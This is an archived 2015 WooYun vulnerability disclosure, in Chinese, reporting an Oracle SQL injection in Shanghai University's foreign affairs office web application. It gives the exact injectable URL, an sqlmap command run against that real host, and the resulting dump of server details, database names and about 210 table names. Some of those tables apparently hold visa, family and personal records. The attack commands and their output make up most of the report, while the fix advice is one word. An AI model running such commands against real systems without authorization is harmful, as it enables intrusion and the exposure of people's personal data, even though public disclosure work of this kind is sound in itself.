漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0109232
漏洞标题:上海大学外事处oracle注入一枚
相关厂商:上海大学
漏洞作者: 小天
提交时间:2015-04-24 15:54
修复时间:2015-04-29 15:56
公开时间:2015-04-29 15:56
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-29: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
对大学做的一次友情测试,,
这么大的oracle数据库,,,,跑的这么卡,,
能不忽略吗,,,,,求rank,,000
详细说明:
一个库里都200多张表的,,,求rank
注入点: http://cg.shu.edu.cn/ForiProject/FrmFrNoticeView.aspx?id=aae173b9-4b38-4955-adc2-a5ce5f75fb8a
C:\Users\mayanfa>sqlmap.py -u http://cg.shu.edu.cn/ForiProject/FrmFrNoticeView
.aspx?id=aae173b9-4b38-4955-adc2-a5ce5f75fb8a --dbs
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WAISHICHU
Database: WAISHICHU
[210 tables]
+-------------------------+
| ATTACHMENT |
| BASE_LABEL |
| CHUSD |
| CONNECTLOG |
| DATALOG |
| DATALOGOLD |
| DIANMPY |
| EMAIL |
| FAZJG |
| FEA_BASEINFO |
| FEA_CONTRACT |
| FEA_CONTRACT_ARR |
| FEA_COUNTRY |
| FEA_EDUCATION |
| FEA_EXAMINE |
| FEA_FAMILY_MEMBERS |
| FEA_FILE |
| FEA_FPP_AWARDS |
| FEA_FPP_PROJECT |
| FEA_FPP_PUBLISHING |
| FEA_FPP_TEACHING |
| FEA_GE_PATENTS |
| FEA_GE_PROJECTS |
| FEA_IP_COST |
| FEA_LATTER |
| FEA_OPINION |
| FEA_OTHERPASS |
| FEA_OTHERPERSONS |
| FEA_PICTURE |
| FEA_SE_COST |
| FEA_SL_COST |
| FEA_TEAM |
| FEA_TEAM_CONTRACT |
| FEA_TEAM_CONTRACT_ARR |
| FEA_TEAM_COUNTRY |
| FEA_TEAM_EDUCATION |
| FEA_TEAM_EXAMINE |
| FEA_TEAM_FAMILY_MEMBERS |
| FEA_TEAM_FILE |
| FEA_TEAM_FPP_AWARDS |
| FEA_TEAM_FPP_PROJECT |
| FEA_TEAM_FPP_PUBLISHING |
| FEA_TEAM_FPP_TEACHING |
| FEA_TEAM_GE_PATENTS |
| FEA_TEAM_GE_PROJECTS |
| FEA_TEAM_OTHERPASS |
| FEA_TEAM_PICTURE |
| FEA_TEAM_TRAINING |
| FEA_TEAM_VISA |
| FEA_TEAM_VOLUNTEER |
| FEA_TEAM_WORKACHIEVE |
| FEA_TEAM_WORKED |
| FEA_TRAINING |
| FEA_VISA |
| FEA_VOLUNTEER |
| FEA_WORKACHIEVE |
| FEA_WORKED |
| FEA_WORKFLOW |
| FT_NOTICE |
| FUX |
| GBP_COUNTRY |
| GONGHGL |
| GUOJSX |
| GUOJZL |
| HUZ |
| HUZSJ |
| MICROSOFTDTPROPERTIES |
| MOBAN |
| OPERATOR |
| OPERATORSX |
| PHOTO |
| QIANZ |
| RIGHTS |
| ROLE |
| RQDWGROUP |
| RQDWRIGHT |
| SEQLOCK |
| SHUJZD |
| SHUJZD_1 |
| SNP_PLAN_TABLE |
| SPBUMEN |
| SPBUMSX |
| SPCFD |
| SPCY |
| SPCY_CFD |
| SPDANWEI |
| SPDANWEIZB |
| SPDAOFCY |
| SPDASHIJI |
| SPDUOCWF |
| SPFAMILY |
| SPFILEBL |
| SPFILELOG |
| SPFILEMB |
| SPKUADQ |
| SPNOTICE |
| SPOPERATORS |
| SPOPERRIGHTS |
| SPPERSONWJ |
| SPPQBM |
| SPPRINT_DATA |
| SPPRINT_DOC |
| SPPW |
| SPRENYZL |
| SPRENYZLBJ |
| SPRIGHTS |
| SPSHEWAI |
| SPSHIJNK |
| SPTESRY |
| SPTUANZ |
| SPTUANZA |
| SPTUANZFY |
| SPTUANZSF |
| SPTUANZSX |
| SPTZEXPORTLOG |
| SPTZJD |
| SPWGQK |
| SPYAOQ |
| SPYAOQSX |
| SPYJ |
| SPZB |
| SPZBCHANGE |
| SPZBSWAP |
| SPZBZL |
| SPZHENGSH |
| SPZHUANBY |
| SP_UPLOAD_TZ |
| SP_UPLOAD_TZD |
| SWAP_TEMP |
| S_HUZ |
| S_HUZSJ |
| S_SPCFD |
| S_SPCY |
| S_SPPW |
| S_SPRENYZL |
| S_SPTUANZ |
| S_SPTUANZSX |
| S_SPTZJD |
| TABLECNN |
| TESRY_1 |
| TIAOJ |
| TMP_GROUP |
| TMP_GROUPVISA |
| TMP_MEMBER |
| TMP_MEMBERBG |
| TMP_MEMBERVISA |
| TMP_VISITPLACE |
| TUANZSMS |
| T_CENTERRIGHT |
| T_CENTERUSER |
| T_CENTERUSERRIGHT |
| T_FILECONTENT |
| T_FORIOPINION |
| T_FORIPERSON |
| T_FORIPERSONA |
| T_FORIPERSONPHOTO |
| T_FORIPERSONXJ |
| T_FORIPERSON_R |
| T_FORIPROJECT |
| T_FORIPROJECTCONDITION |
| T_FORIPROJECTDETAIL |
| T_FRMEMBER |
| T_FRNOTICE |
| T_FRNOTICEFILE |
| T_FRPROGRESS |
| T_FRQIANZDEPART |
| T_FRTEAM |
| T_LBDEPART |
| T_LBDEPARTFILE |
| T_LBLEADER |
| T_LBMEMBER |
| T_LBMEMBER_INNER |
| T_LBPHOTO |
| T_LBRCPHOTO |
| T_LBRICHENG |
| T_LBTEAM |
| T_LBTEAMA |
| T_LBVISITPLACE |
| T_LOGINLOG |
| T_MEETAUDIT |
| T_MEETING |
| T_MEETPERSON |
| T_NATION |
| T_NEWSUMREPORT |
| T_NEWSUMREPORTFILE |
| T_NOTICE |
| T_PRINTPDF |
| T_PRINTPDFDATA |
| T_PRIVISATEAM |
| T_RESTART |
| T_SCHOLARSHIP |
| T_SPDATADIC |
| T_SPOFFICER |
| T_SPOPINION |
| T_SPPLAN |
| T_SPPLANDETAIL |
| T_SPRICHENG_NEW |
| T_UPCOUNTRY |
| T_UPMEMBER |
| T_UPOPINION |
| T_UPPERSON |
| T_UPRICHENG_NEW |
| T_UPTEAM |
| T_UPTEAMA |
| T_UPTEAM_RC |
| T_UPTEAM_RC_NOTICE |
| WORDSAVE |
| ZHENGJLY |
| ZHONGL |
| ZIDUAN |
+-------------------------+
漏洞证明:
rt
修复方案:
过滤
版权声明:转载请注明来源 小天@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-04-29 15:56
厂商回复:
最新状态:
暂无